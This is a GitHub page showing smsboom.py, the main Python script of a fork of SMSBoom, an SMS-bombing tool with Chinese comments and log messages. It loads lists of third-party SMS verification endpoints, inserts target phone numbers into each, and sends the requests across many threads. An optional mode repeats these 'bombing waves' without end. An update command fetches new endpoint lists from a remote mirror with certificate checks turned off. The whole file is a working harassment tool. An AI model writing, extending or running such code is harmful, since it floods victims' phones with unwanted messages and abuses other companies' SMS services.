forked from OpenEthan/SMSBoom
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsmsboom.py
173 lines (149 loc) · 5.71 KB
/
smsboom.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
# encoding=utf8
# 短信测压主程序
import pathlib
import sys
from typing import List, Union
import click
import json
import httpx
from loguru import logger
from concurrent.futures import ThreadPoolExecutor
import time
import sys
from utils import API, default_header
# logger config
logger.remove()
logger.add(
sink=sys.stdout,
format="<green>{time:YYYY-MM-DD at HH:mm:ss}</green> - <level>{level}</level> - <level>{message}</level>",
colorize=True,
backtrace=True
)
# current directory
path = pathlib.Path(__file__).parent
def load_json() -> List[API]:
"""load json for api.json
:return: api list
"""
json_path = pathlib.Path(path, 'api.json')
if not json_path.exists():
logger.error("Json file not exists!")
# return None
raise ValueError
with open(json_path.resolve(), mode="r", encoding="utf8") as j:
try:
datas = json.loads(j.read())
APIs = [
API(**data)
for data in datas
]
logger.success(f"api.json 加载完成 接口数:{len(APIs)}")
return APIs
except Exception as why:
logger.error(f"Json file syntax error:{why}")
# return None
raise ValueError
def load_getapi() -> list:
"""load GETAPI
:return:
"""
json_path = pathlib.Path(path, 'GETAPI.json')
if not json_path.exists():
logger.error("GETAPI.json file not exists!")
# return None
raise ValueError
with open(json_path.resolve(), mode="r", encoding="utf8") as j:
try:
datas = json.loads(j.read())
logger.success(f"GETAPI加载完成,数目:{len(datas)}")
return datas
except Exception as why:
logger.error(f"Json file syntax error:{why}")
# return None
raise ValueError
def reqAPI(api: API, client: httpx.Client) -> httpx.Response:
if isinstance(api.data, dict):
resp = client.request(method=api.method, json=api.data,
headers=api.header, url=api.url)
else:
resp = client.request(method=api.method, data=api.data,
headers=api.header, url=api.url)
return resp
def req(api: Union[API, str], phone: tuple):
"""请求接口方法"""
# 多手机号支持
if isinstance(phone, tuple):
phone_lst = [_ for _ in phone]
else:
phone_lst = [phone]
with httpx.Client(headers=default_header, verify=False) as client:
for ph in phone_lst:
try:
if isinstance(api, API):
api = api.handle_API(ph)
resp = reqAPI(api, client)
logger.info(f"{api.desc}-{resp.text[:30]}")
else:
api = api.replace("[phone]", ph)
resp = client.get(url=api, headers=default_header)
logger.info(f"GETAPI接口-{resp.text[:30]}")
except httpx.HTTPError as why:
logger.error(f"{why.request.url}请求失败{why}")
@click.command()
@click.option("--thread", "-t", help="线程数(默认64)", default=64)
@click.option("--phone", "-p", help="手机号,可传入多个再使用-p传递", prompt=True, required=True, multiple=True)
@click.option('--super', "-s", is_flag=True, help="循环模式")
@click.option('--interval', "-i", default=60, help="循环间隔时间(默认60s)", type=int)
def run(thread: int, phone: Union[str, tuple], interval: int, super: bool = False):
"""传入线程数和手机号启动轰炸,支持多手机号"""
logger.info(f"循环模式:{super},手机号:{phone},线程数:{thread},循环间隔:{interval}")
with ThreadPoolExecutor(max_workers=thread) as pool:
try:
_api = load_json()
_api_get = load_getapi()
except ValueError:
logger.error("读取接口出错!正在重新下载接口数据!....")
update()
sys.exit(1)
i = 0
if super:
while True:
i += 1
logger.success(f"第{i}波轰炸开始!")
for api in _api:
pool.submit(req, api, phone)
for api_get in _api_get:
pool.submit(req, api_get, phone)
logger.success(f"第{i}波轰炸提交结束!休息{interval}s.....")
time.sleep(interval)
else:
for api in _api:
pool.submit(req, api, phone)
for api_get in _api_get:
pool.submit(req, api_get, phone)
@click.command()
def update():
"""从 github 获取最新接口"""
GETAPI_json_url = f"https://hk1.monika.love/AdminWhaleFall/SMSBoom/master/GETAPI.json"
API_json_url = f"https://hk1.monika.love/AdminWhaleFall/SMSBoom/master/api.json"
logger.info(f"正在从GitHub拉取最新接口!")
try:
with httpx.Client(verify=False, timeout=10) as client:
# print(API_json_url)
GETAPI_json = client.get(GETAPI_json_url, headers=default_header).content.decode(encoding="utf8")
api_json = client.get(API_json_url, headers=default_header).content.decode(encoding="utf8")
except Exception as why:
logger.error(f"拉取更新失败:{why}请关闭所有代理软件多尝试几次!")
else:
with open(pathlib.Path(path, "GETAPI.json").absolute(), mode="w", encoding="utf8") as a:
a.write(GETAPI_json)
with open(pathlib.Path(path, "api.json").absolute(), mode="w", encoding="utf8") as a:
a.write(api_json)
logger.success(f"接口更新成功!")
@click.group()
def cli():
pass
cli.add_command(run)
cli.add_command(update)
if __name__ == "__main__":
cli()